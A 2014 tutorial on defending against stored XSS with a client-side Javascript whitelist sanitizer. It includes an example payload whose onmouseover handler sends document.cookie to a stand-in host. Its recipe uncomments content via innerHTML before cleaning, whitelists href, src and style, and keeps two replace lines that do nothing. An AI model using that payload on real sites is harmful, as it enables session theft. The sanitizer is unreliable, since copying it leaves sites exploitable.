

 

Frontend protection against Stored XSS Attacks
(Javascript kills XSS)

  Max Petrov August 2014

Stored XSS attacks

      A Cross Site Scripting attack is a harmful action carried out in the user's browser in order to steal data or cause other damage. To avoid confusion with CSS (Cascading Style Sheets), Cross Site Scripting is abbreviated as XSS.

      Stored XSS attacks are those in which an attacker injects harmful Javascript into an HTML page. The injection goes through the input forms of the site (text boxes, input boxes, contenteditable elements). After the attacker clicks the Submit button, the XSS is sent to the server and stored there (hence the name Stored XSS). When users request the infected HTML page, their browsers run the XSS contained in the message, and the attack takes place.

Server (Backend) protection from Stored XSS Attacks

      The solution seems simple. We must prevent the browser from executing Javascript code that may be contained in the text users add to the site. Every place in the visitors' messages that explicitly or possibly includes Javascript has to be neutralized. Such places are:
      HTML nodes <SCRIPT> . . . </SCRIPT>,
      event handlers in tags (attributes such as onmouseover),
      pseudo-protocols javascript: .

      Links, pictures, and styles in tags (for example, the background attribute) are suspicious. Any place where an Internet address can be specified is dangerous, because the pseudo-protocol javascript: can be written there instead.
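
      As an illustration of why address attributes are suspicious, here is a minimal sketch of a conservative check for the javascript: pseudo-protocol. The function name looksLikeScriptUrl is hypothetical and not part of the article's code. The sketch assumes the value has already been read from the DOM (so HTML entities are decoded) and that whitespace and control characters may be used to disguise the scheme.

```javascript
// Hypothetical helper: conservative check of an attribute value
// (href, src, background, ...) for the javascript: pseudo-protocol.
function looksLikeScriptUrl(value) {
    // Drop whitespace and control characters so that "java\tscript:"
    // or a value with leading spaces is still recognized.
    var compact = String(value).replace(/[\u0000-\u0020]/g, "").toLowerCase();
    return compact.indexOf("javascript:") === 0;
}
```

      The check is deliberately stricter than a browser: it may reject a harmless value, but that is the safer side to err on.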

      So the task is to remove dangerous character sequences from the text. Usually this is implemented as follows: on the server, a PHP filter parses the text received from the browser and cuts out or replaces any suspicious fragments. This approach has a flaw. Browsers execute Javascript and know nothing about PHP. The server, on the contrary, knows PHP and does not know Javascript. The weakness of server protection from XSS is that the server does not understand what it is filtering.

      This makes clear where the authors of stored XSS attacks direct their efforts. For each attacked site they select ways to obfuscate malicious Javascript. The PHP filter does not know Javascript, so it can be deceived. Worst of all, sometimes the PHP filter even helps to infect the site.

      The simplest example. The attacker enters
      <p oonmouseovernmouseover='location.href="http://example.com/" + document.cookie'>
The message is sent to the server. On the server, the PHP filter sees the dangerous character sequence onmouseover and cuts it out. As a result, oonmouseovernmouseover, which browsers do not recognize and which poses no threat, turns into onmouseover. As you can see, the PHP filter did not prevent an XSS attack but created one.
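
      The effect is easy to reproduce. The sketch below imitates such a filter in Javascript (the article's filter is written in PHP, and the function names naiveStrip and stripUntilStable are hypothetical). The payload is shortened to alert(1) for readability.

```javascript
// Hypothetical single-pass filter: deletes every occurrence of one
// blacklisted word and never re-checks its own output.
function naiveStrip(text, word) {
    return text.split(word).join("");
}

// For comparison: repeat until nothing changes, so a word reassembled
// by an earlier deletion is caught on the next pass.
function stripUntilStable(text, word) {
    var previous;
    do {
        previous = text;
        text = naiveStrip(text, word);
    } while (text !== previous);
    return text;
}

var input = "<p oonmouseovernmouseover='alert(1)'>";
var once = naiveStrip(input, "onmouseover");
var stable = stripUntilStable(input, "onmouseover");
```

      Here once contains a working onmouseover handler that was not in the input, while stable no longer contains the word. Repeating the pass fixes only this particular trick; it does not make a blacklist filter understand Javascript.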

Browser (Frontend) protection from stored XSS-attacks

      We do not need to build an HTML parser. HTML parsers already exist: they are in the browsers. It is tempting to use them and shift the task of recognizing stored XSS attacks (and protecting against them) to the browsers. Then the server no longer has to foresee whether this or that browser would see active content in a message posted in the forum. It is more logical to ask the browser. If the browser has detected a script, we should order the browser to neutralize that script.

Secure upload to the browsers

      The browser executes Javascript while the page is loading. Even if a text fragment is invisible or hidden, any Javascript in it will still be run. No HTML tag that prohibits the execution of Javascript has been invented yet. If such a tag existed, the problem of stored XSS attacks would not arise at all.

      We need passive loading of text into the browser, that is, loading which prevents Javascript from running. The only thing that comes to mind is to use a comment (<!-- . . . -->). A commented string is not interpreted by browsers and is not displayed, but it is loaded and embedded in the DOM (Document Object Model). Thus, even when the page is known to contain content suspected of XSS, we can return this page to browsers without fear. It is only necessary to comment out the doubtful fragments of the text in advance.

      When loading is finished, the browser should analyze the parts of the text we have marked, make them safe, and only then show them to the user. We will use the event that corresponds to the end of HTML page loading. It is called onload and applies to the HTML node body. We write the following:
      <body onload='getid("message")'>,
where getid("message") is a function that accepts the id of the node whose content should be analyzed and treated.

Selector of fragments (Javascript function)

      The Microsoft browser IExplorer, versions 6 and 7, is still in use. Based on Runet statistics, the share of IExplorer 6 and 7 can be estimated at 1% of traffic. These are perhaps the most vulnerable browsers. I think the protection should be built so that it works starting from IExplorer 6, even if this makes the code somewhat rougher.

      IExplorer 6 cannot return a collection of nodes by class name (document.getElementsByClassName() is not available there), but document.getElementById() returns a single object in every browser. We have to adapt to the weakest. We will receive the fragments of text the way IExplorer 6 wants, that is, one at a time. For this we have to allow many fragments with the same id on one HTML page. This is against the rules, but it gives us a cross-browser script.

      Function getid(id)
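function getid(id) {
    var obj;
    // Several nodes may share the same id, so take them one at a time.
    while ( document.getElementById(id) ) {
        obj = document.getElementById(id);
        // Remove the id so that the next pass finds the next node.
        obj.removeAttribute("id");
        // Uncomment the content: the browser now parses it into DOM nodes.
        obj.innerHTML = obj.innerHTML.replace("<!--", "").replace("-->", "");
        // Delete the tags and attributes that are not in the white lists.
        clearhtml(obj);
        // Delete the remaining tags that mention "script" or "js:".
        obj.innerHTML = obj.innerHTML.replace(/<[^>]*?script[^>]*?>/gi, "");
        obj.innerHTML = obj.innerHTML.replace(/<[^>]*?js:[^>]*?>/gi, "");
    }
}

      Nothing here is complex.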

HTML cleaner (Javascript function)

      Using the methods and properties of the DOM you can get, in particular:
      the array of inner HTML nodes,
      the name of each inner HTML node,
      the names of all the attributes of each HTML node.

      In the tag
<div id="a2" class="myclass" contenteditable="true" align="right" onmousemove="alert('onmousemove!')" style="color:green" blablabla="blablabla">

div is the name of the HTML node. Everything else (id="a2", class="myclass", contenteditable="true", align="right", onmousemove="alert('onmousemove!')", style="color:green", blablabla="blablabla") is the set of HTML attributes of the div node. Anything written in the tag in the form name="value" is an attribute. Thus id, class, style, event handlers, and even nonsense like blablabla="blablabla" are all attributes. The DOM does not classify attributes by name or value. From the point of view of the DOM, event handler attributes are no different from other attributes.

      Let's apply the white list approach. A white list is an exhaustive list of allowed tags and attributes. Everything that is not in the white list is destroyed ruthlessly. The algorithm: go through all the child nodes and delete those that are not in the list. In the same way, go through all the attributes of each allowed node.
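
      The algorithm can be sketched without a browser on a simplified tree. In the sketch below the node shape { tag, attrs, children } is a hypothetical stand-in for DOM nodes, the lists are shortened, and the names allowedTags, allowedAttrs, inList, and cleanTree are illustrative only.

```javascript
// Illustrative white lists (shortened).
var allowedTags = ["DIV", "P", "B", "A"];
var allowedAttrs = ["class", "href", "title"];

function inList(list, value) {
    for (var i = 0; i < list.length; i++) {
        if (list[i] === value) { return true; }
    }
    return false;
}

function cleanTree(node) {
    // Walk backwards so that removing an item does not shift the
    // indexes of the items still to be visited.
    for (var i = node.children.length - 1; i >= 0; i--) {
        var child = node.children[i];
        if (!inList(allowedTags, child.tag.toUpperCase())) {
            node.children.splice(i, 1);   // drop the tag with its content
            continue;
        }
        for (var name in child.attrs) {
            if (child.attrs.hasOwnProperty(name) &&
                !inList(allowedAttrs, name.toLowerCase())) {
                delete child.attrs[name];
            }
        }
        cleanTree(child);                 // same treatment for nested tags
    }
    return node;
}
```

      Note that the white list decides only by name. An allowed attribute such as href can still carry a javascript: address, so attribute values need a separate check.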

      Higher-order functions (array.forEach(), array.some()) cannot be used, because IExplorer 6 does not understand them. We will write simple loops. In addition, IExplorer 6 reports the full set of attributes (several dozen) for any tag, even if the tag has no attributes at all. Therefore we check the specified property of each attribute to see whether it was set explicitly.

      Another complication is related to IExplorer 6. Event handler attributes cannot be removed there with node.removeAttribute("attrName"), which is the usual way in other browsers. In IExplorer it works differently: node.attrName = null. However, we then have to check (at least by the first characters "on") whether the attribute is an event handler. Otherwise the script aborts when we try to set to null an attribute that cannot be null (for example, contentEditable).
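
      Taken on its own, this step might look like the sketch below. The helper names isEventHandlerName and dropAttribute are hypothetical; node is assumed to be any object with a removeAttribute(name) method, such as a DOM element.

```javascript
// Hypothetical helper: does the attribute name look like an event handler?
function isEventHandlerName(name) {
    return name.substring(0, 2).toLowerCase() === "on";
}

// Hypothetical helper: remove one attribute in a way that also
// suits old IExplorer.
function dropAttribute(node, name) {
    if (isEventHandlerName(name)) {
        // Old IExplorer: clear the handler through the property.
        node[name] = null;
    }
    // All browsers: remove the attribute itself.
    node.removeAttribute(name);
}
```

      Attributes that do not start with "on" are never assigned null, which avoids the abort described above.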

      Function clearhtml(obj) :
var tlist = new Array ( 'DIV', 'SPAN', 'IMG', 'P', 'A', 'B', 'I', 'U', 'S', 'TABLE', 'TBODY', 'TR', 'TH', 'TD', 'SUP', 'SUB' );
var alist = new Array ( "class", "style", "align", "src", "href", "alt", "title" );

function clearhtml(obj) {
    var children = obj.children;
    var tagcor, attrcor, i, j, k;
    // Walk backwards: removing a child then never shifts a node
    // that has not been checked yet.
    for (i = children.length - 1; i >= 0; i--) {
        if ( children[i].tagName.toUpperCase() == 'BR' ) { continue; }
        // Is the tag in the white list?
        tagcor = false;
        for (j = 0; j < tlist.length; j++) {
            if (children[i].tagName.toUpperCase() == tlist[j]) { tagcor = true; break; }
        }
        if ( tagcor ) {
            j = 0;
            while (children[i].attributes[j]) {
                // IExplorer 6 lists dozens of attributes; check only the explicit ones.
                if ( children[i].attributes[j].specified ) {
                    attrcor = false;
                    for (k = 0; k < alist.length; k++) {
                        if (children[i].attributes[j].nodeName == alist[k]) { attrcor = true; break; }
                    }
                    if ( !attrcor ) {
                        // IExplorer 6: event handlers are reset through the property.
                        if (children[i].attributes[j].nodeName.substring(0,2) == "on") {
                            children[i][children[i].attributes[j].nodeName] = null;
                        }
                        children[i].removeAttribute(children[i].attributes[j].nodeName);
                        // Mark the node as one that contained a script.
                        children[i].className = "SCRIPTCONTENT";
                        j--;
                    }
                }
                j++;
            }
            // Treat the nested tags in the same way.
            clearhtml(children[i]);
        } else {
            // The tag is not allowed: delete it together with its content.
            obj.className = "SCRIPTCONTENT";
            obj.removeChild(children[i]);
        }
    }
}

      The terms tag, node, and HTML container are used here as synonyms.

      That's all. The code was tested in the following browsers: Internet Explorer 6; SlimBrowser 7.00 build 103; Avant Browser 2014 build 7; Firefox 12.0; Safari 5.0.2; Comodo Dragon 4.1.1.12; Opera 18.0; Yandex 13.12.1599.12785; SRWare Iron 6.0.475; Chromium 28.0.1500.75.

In the form of a recipe

      For those who would like to use this without delving into the details, it is given below in the form of a recipe suitable for quick application.

      File script.js :
// These are allowed html-containers (all the others will be deleted together with content):
var tlist = new Array ( 'DIV', 'SPAN', 'IMG', 'P', 'A', 'B', 'I', 'U', 'S', 'TABLE', 'TBODY', 'TR', 'TH', 'TD', 'SUP', 'SUB' );
// These are allowed attributes (all others will be removed from allowed tags):
var alist = new Array ( "class", "style", "align", "src", "href", "alt", "title" );

function getid(id) {
    var obj;
    while ( document.getElementById(id) ) {
        obj = document.getElementById(id);
        obj.removeAttribute("id");
        obj.innerHTML = obj.innerHTML.replace("<!--", "").replace("-->", "");
        // Meant to break up "script:" and "js:" so that pseudo-protocols stop working.
        // NOTE: as written here the replacement equals the match, so these two
        // lines change nothing; the getid() listing earlier in the article
        // deletes such tags with regular expressions instead.
        obj.innerHTML = obj.innerHTML.replace(/script:/gi, "script:");
        obj.innerHTML = obj.innerHTML.replace(/js:/gi, "js:");
        clearhtml(obj);
    }
}

function clearhtml(obj) {
    var children = obj.children;
    var tagcor, attrcor, i, j, k;
    // Walk backwards: removing a child then never shifts a node
    // that has not been checked yet.
    for (i = children.length - 1; i >= 0; i--) {
        if ( children[i].tagName.toUpperCase() == 'BR' ) { continue; }
        tagcor = false;
        for (j = 0; j < tlist.length; j++) {
            if (children[i].tagName.toUpperCase() == tlist[j]) { tagcor = true; break; }
        }
        if ( tagcor ) {
            j = 0;
            while (children[i].attributes[j]) {
                if ( children[i].attributes[j].specified ) {
                    attrcor = false;
                    for (k = 0; k < alist.length; k++) {
                        if (children[i].attributes[j].nodeName == alist[k]) { attrcor = true; break; }
                    }
                    if ( !attrcor ) {
                        if (children[i].attributes[j].nodeName.substring(0,2) == "on") {
                            children[i][children[i].attributes[j].nodeName] = null;
                        }
                        children[i].removeAttribute(children[i].attributes[j].nodeName);
                        children[i].className = "SCRIPTCONTENT";
                        j--;
                    }
                }
                j++;
            }
            clearhtml(children[i]);
        } else {
            obj.className = "SCRIPTCONTENT";
            obj.removeChild(children[i]);
        }
    }
}

      Site page on the server:
<html>
<head>
<script type="text/javascript" src="script.js"></script>
</head>
<body onload='getid("message")'>
<div id ="message"> <!-- HERE IS MALICIOUS CONTENT --> </div>
<div id ="message"> <!-- HERE IS MALICIOUS CONTENT --> </div>
<div id ="message"> <!-- HERE IS MALICIOUS CONTENT --> </div>
</body>
</html>

      On the server, message processing consists solely of deleting the comment tags, if any are found. In other words, the character sequences <!-- and --> must always be removed from (or replaced in) the text to be added to the site. The server must insert a potentially dangerous fragment into the container
      <div id ="message"><!-- HERE IS MALICIOUS CONTENT --></div>
Do not forget to add the handler onload='getid("message")' to the body tag. Write the allowed tags and attributes into the script file.
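
      The server step can be sketched as follows. The article's server runs PHP; Javascript is used here only to keep one language in the examples, and the function names stripCommentMarks and wrapMessage are hypothetical. Two details are assumptions beyond the recipe: the removal is repeated until the text stops changing (a single pass can reassemble a comment mark, just like the onmouseover example), and the sequence --!> is removed as well, because HTML5 parsers also accept it as the end of a comment.

```javascript
// Hypothetical helper: remove comment marks until none can be
// reassembled from the remaining pieces.
function stripCommentMarks(text) {
    var previous;
    do {
        previous = text;
        text = text.split("<!--").join("")
                   .split("--!>").join("")   // assumption: HTML5 comment end
                   .split("-->").join("");
    } while (text !== previous);
    return text;
}

// Hypothetical helper: put the cleaned message into the commented
// container expected by getid("message").
function wrapMessage(text) {
    return '<div id ="message"><!-- ' + stripCommentMarks(text) + ' --></div>';
}
```

      The spaces next to the comment marks keep characters at the edges of the message (for example, a trailing hyphen) from merging with the marks.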

Discussion

      Please write your questions, comments, and opinions here: http://ironburattin.ru/6/index.php .





© Max Petrov. A link to sadda.ru is required when using these materials.